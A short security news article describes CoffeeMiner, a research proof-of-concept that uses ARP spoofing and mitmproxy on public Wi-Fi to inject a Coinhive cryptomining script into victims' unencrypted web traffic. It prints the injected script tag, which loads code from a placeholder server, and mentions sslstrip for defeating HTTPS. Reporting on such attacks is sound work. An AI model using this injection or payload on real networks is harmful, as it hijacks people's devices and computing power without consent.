Researcher Proposes Mining Cryptocurrency via Public Wi-Fi Networks Using CoffeeMiner Attack

An independent cybersecurity specialist known as Arnau has published an intriguing proof-of-concept called CoffeeMiner, along with a related study. The inspiration for this project came from an incident in December 2017 in Buenos Aires, where it was discovered that a local Starbucks coffee shop’s Wi-Fi network was not only providing internet access to customers but was also secretly mining cryptocurrency using the devices connected to the public network.

Arnau emphasizes that CoffeeMiner and its source code are published solely as a theoretical academic study, intended for educational and research purposes. The attack essentially replicates what happened in Argentina and enables a type of man-in-the-middle attack. CoffeeMiner is designed to spoof the Address Resolution Protocol (ARP) in order to intercept unencrypted traffic from devices on the same network. To inject HTML code into unprotected traffic, the well-known tool mitmproxy is used. The process looks like this:

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>

As a result, JavaScript is launched, which uses the victim’s CPU resources for mining. In his experiments, the researcher used the popular browser-based mining script Coinhive to mine Monero cryptocurrency.

The specialist notes that this type of attack can be easily automated. Although CoffeeMiner in its current form cannot work with HTTPS traffic, this limitation can be overcome, for example, by using sslstrip.

Below, you can see a demonstration of CoffeeMiner in action, both in VirtualBox and in real-world scenarios.